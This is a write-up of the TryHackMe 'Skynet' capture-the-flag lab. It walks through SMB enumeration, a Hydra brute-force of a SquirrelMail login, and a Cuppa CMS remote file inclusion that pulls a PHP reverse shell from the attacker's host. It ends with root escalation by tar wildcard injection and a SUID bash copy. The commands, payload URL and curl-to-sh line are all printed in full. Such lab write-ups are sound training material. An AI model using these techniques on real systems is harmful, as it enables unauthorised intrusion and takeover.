Initial Reconnaissance

Perform a comprehensive port scan on the target using Nmap

10.112.185.65
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA)
|   256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA)
|_  256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (ED25519)
80/tcp  open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Skynet
110/tcp open  pop3        Dovecot pop3d
|_pop3-capabilities: SASL RESP-CODES CAPA UIDL AUTH-RESP-CODE PIPELINING TOP
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
|_imap-capabilities: have ID LOGINDISABLEDA0001 LITERAL+ IMAP4rev1 more listed OK post-login capabilities Pre-login ENABLE IDLE LOGIN-REFERRALS SASL-IR
445/tcp open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=4/19%OT=22%CT=1%CU=37747%PV=Y%DS=1%DC=T%G=Y%TM=69E5565
OS:8%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=10C%TI=Z%CI=I%II=I%TS=8)OPS
OS:(O1=M2301ST11NW7%O2=M2301ST11NW7%O3=M2301NNT11NW7%O4=M2301ST11NW7%O5=M23
OS:01ST11NW7%O6=M2301ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68
OS:DF)ECN(R=Y%DF=Y%T=40%W=6903%O=M2301NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A
OS:=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%
OS:Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=
OS:A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=
OS:Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%
OS:T=40%CD=S)

Network Distance: 1 hop
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h39m59s, deviation: 2h53m12s, median: -1s
|_nbstat: NetBIOS name: SKYNET, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: skynet
|   NetBIOS computer name: SKYNET\x00
|   Domain name: \x00
|   FQDN: skynet
|_  System time: 2026-04-19T17:25:27-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2026-04-19T22:25:27
|_  start_date: N/A

TRACEROUTE (using port 53/tcp)
HOP RTT     ADDRESS
1   0.60 ms 10.112.185.65

SMB Enumeration

Enumerate the SMB to check for any readable files from which we can obtain important information

Listing Available Shares

crackmapexec smb 10.112.185.65 -u '' -p '' --shares
SMB         10.112.185.65   445    SKYNET           [*] Windows 6.1 (name:SKYNET) (domain:) (signing:False) (SMBv1:True)
SMB         10.112.185.65   445    SKYNET           [+] \: 
SMB         10.112.185.65   445    SKYNET           [*] Enumerated shares
SMB         10.112.185.65   445    SKYNET           Share           Permissions     Remark
SMB         10.112.185.65   445    SKYNET           -----           -----------     ------
SMB         10.112.185.65   445    SKYNET           print$                          Printer Drivers
SMB         10.112.185.65   445    SKYNET           anonymous       READ            Skynet Anonymous Share
SMB         10.112.185.65   445    SKYNET           milesdyson                      Miles Dyson Personal Share
SMB         10.112.185.65   445    SKYNET           IPC$                            IPC Service (skynet server (Samba, Ubuntu))

Findings:

• anonymous — accessible without credentials
• milesdyson — likely a user's private share
• IPC$ — inter-process communication share

Accessing the Anonymous Share

smbclient -U '' //10.112.185.65/anonymous

found a text file called "attention.txt."

Content:

This confirms milesdyson as a valid username and hints at password changes.

Navigate to the logs directory:

Download all three files:

get log1.txt
get log2.txt
get log3.txt

Analysis:

• log1.txt contains a list of passwords
• log2.txt and log3.txt are empty

Web Application Enumeration

Directory Bruteforcing

dirb http://10.112.185.65/

A /squirrelmail directory is found — this is a webmail interface

intercept the request and response of this login page using Burp Suite

Using Hydra to brute-force the login

hydra -l milesdyson -P /root/log1.txt 10.112.185.65 http-post-form "/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:F=Unknown user or password incorrect."

and successfully found milesdyson Account Password

Username : milesdyson
Password : cyborg007haloterminator

Log into SquirrelMail using the discovered credentials.

The inbox contains three emails

This provides the SMB password for the milesdyson share.

Password: )s{A&2Z=F^n_E.B`

I checked the other emails and did not find anything interesting in them. Let's now try to connect to Milesdyson's SMB using the credentials we just found.

crackmapexec smb 10.112.185.65 -u 'milesdyson' -p ')s{A&2Z=F^n_E.B`' --shares --local-auth
SMB         10.112.185.65   445    SKYNET           [*] Windows 6.1 (name:SKYNET) (domain:SKYNET) (signing:False) (SMBv1:True)
SMB         10.112.185.65   445    SKYNET           [+] SKYNET\milesdyson:)s{A&2Z=F^n_E.B` 
SMB         10.112.185.65   445    SKYNET           [*] Enumerated shares
SMB         10.112.185.65   445    SKYNET           Share           Permissions     Remark
SMB         10.112.185.65   445    SKYNET           -----           -----------     ------
SMB         10.112.185.65   445    SKYNET           print$          READ            Printer Drivers
SMB         10.112.185.65   445    SKYNET           anonymous       READ            Skynet Anonymous Share
SMB         10.112.185.65   445    SKYNET           milesdyson      READ            Miles Dyson Personal Share
SMB         10.112.185.65   445    SKYNET           IPC$                            IPC Service (skynet server (Samba, Ubuntu))

Finding the Hidden Directory

Navigate to the notes directory:

smbclient -U 'milesdyson' //10.112.185.65/milesdyson

Download important.txt

get important.txt

Content:

A hidden directory /45kra24zxs28v3yd is revealed

Navigate to http://10.112.185.65/45kra24zxs28v3yd/. This displays a personal page for Miles Dyson

Further directory enumeration reveals an administrator panel

dirsearch -u http://10.112.185.65/45kra24zxs28v3yd/

Discovery: /45kra24zxs28v3yd/administrator/ — this is a Cuppa CMS login page.

search for an exploit to cuppa cms

This is the Exploit description

An attacker might include local or remote PHP files or read non-PHP files with this vulnerability. User tainted data is used when creating the file name that will be included into the current file. PHP code in this file will be evaluated, non-PHP code will be embedded to the output. This vulnerability can lead to full server compromise.

exploit :

Download the PentestMonkey PHP reverse shell

php-reverse-shell.phppentestmonkey/php-reverse-shell

change the required parameter to fit with my target

Start a Python HTTP server to host the shell

python3 -m http.server 1234

Start a Netcat listener:

nc -lvnp 4444

Triggering the RFI Exploit

Send the following request to include and execute the reverse shell

http://10.112.185.65/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.112.82.136:1234/php-reverse-shell.php

A reverse shell connection is established as www-data

Capturing the User Flag

cd /home/milesdyson
cat user.txt

Privilege Escalation — Tar Wildcard Injection

Download LinPEAS in the local machine

curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh

Transfer it to the victim machine

wget http://10.112.82.136:1234//linpeas.sh -o linpeas.sh

chmod +x linpeas.sh.1
./linpeas.sh.1

Identifying the Cronjob

let's check the content of backup.sh

cat /home/milesdyson/backups/backup.sh
#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *

The script uses tar with a wildcard (*). Since I have write access to /var/www/htmlI can exploit tar's --checkpoint options via wildcard injection.

Let me describe what is happening here:

There is a cron job that runs every minuteroot, making a backup of all files in /var/www/html. The issue arises because the backup command uses a wildcard (*). If a file has a name that starts with --, The backup program interprets it as an option or command to execute, rather than a file to back up. This behavior is what we will exploit.

To exploit this vulnerability, I will create the following three files in /var/www/html:

1. --checkpoint=1 This tricks tar into enabling checkpoint mode.

2. --checkpoint-action=exec=sh shell.sh This tricks tar into executing a command — specifically, running shell.sh.

3. shell.sh containing the following:

cp /bin/bash /tmp/bash && chmod +s /tmp/bash

This makes a copy of the Bash shell in /tmp and sets the SUID bit, turning it into a "root shell."

The next step is to wait one minute for the cron job to execute. When it runs, the following will occur:

• The tar command will see the malicious files.
• It will interpret them as commands instead of files.
• It will execute shell.sh as root.
• This will create a root-owned shell at /tmp/bash with SUID permissions.

Finally, I will run the following command to gain root access:

/tmp/bash -p

Capturing the Root Flag

cat /root/root.txt

Finally, thank you very much for reading to the end. I hope you found this article interesting.

Room Link: https://tryhackme.com/room/skynet

TryHackMe: https://tryhackme.com/p/AbdallahSamir

LinkedIn: Abdallah Samir | LinkedIn

X(Twitter): https://x.com/abdalla_jr7